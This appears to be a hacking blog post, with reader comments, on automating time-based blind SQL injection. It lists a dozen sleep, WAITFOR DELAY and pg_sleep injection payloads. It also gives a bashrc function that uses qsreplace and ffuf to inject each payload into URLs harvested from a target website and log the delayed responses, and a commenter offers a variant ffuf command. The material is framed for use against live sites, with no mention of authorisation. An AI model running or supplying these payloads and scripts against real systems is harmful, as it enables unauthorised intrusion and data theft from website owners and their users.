Tools
- First we need latest version of go-lang install
- ffuf |
go get -u github.com/ffuf/ffuf - qsreplace |
go get -u github.com/tomnomnom/qsreplace
PAYLOADS
XOR(if(now()=sysdate(),sleep(5),0))OR%27
if(now()=sysdate(),sleep(5),0)
(select(0)from(select(sleep(5)))v)/%27+(select(3)from(select(sleep(5)))v)+%27%22+(select(0)from(select(sleep(5)))v)+%22/
%27XOR(if(now()=sysdate(),sleep(51),0))XOR%27Z 1%20AND%20(SELECT%20%20FROM%20(SELECT(SLEEP(5)))YYYY)%20AND%20%27%%27=%27
1%27XOR(if(now()=sysdate(),sleep(5),0))OR%27
1%20AND%20(SELECT%201337%20FROM%20(SELECT(SLEEP(5)))YYYY)-1337
1%20or%20sleep(5)%23
%27%20WAITFOR%20DELAY%20%270:0:5%27–
%%27;SELECT%20PG_SLEEP(5)–
pg_sleep(5)
%27|%20|pg_sleep(5)–
ıllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıll lıllııllıllııllıllııllıllıılıllııllıllııllıllııllıllıılıllııllıllııllıllııllıllııll
Add-in .bashrc function
# Time Based Sql Injection
sqliTime()
{
for i in $(cat ~/.path/To/payloads) ; do
cat $1 | qsreplace "$i" > sqli
ffuf -u FUZZ -w sqli -s -ft "<5000" | tee -a vulnSqli.txt
rm sqli
done
}If you run this method every time or every new tab, You should enter,
source .bashrcExample Usage:
You can use any of these tools gau, gauplus, or waybackurls to getting an URLs
After Collecting an URLs of targeted website
sqliTime urls
sqliTime urls.txtThanks for reading! I hope this helps, For more Tips & methodology Follow
↫↫↫↫↫☺HΛCKING☺↬↬↬↬↬
I just found your blog and I am loving the content!
I really want to try this Blind SQLi technique using Fuff.
What do you mean by this part??
“If you run this method every time or every new tab, You should enter,
source .bashrc”
ffuf -w “urls.txt:URL” -w timebased.txt -u URLFUZZ -ft “<5000”
What about this?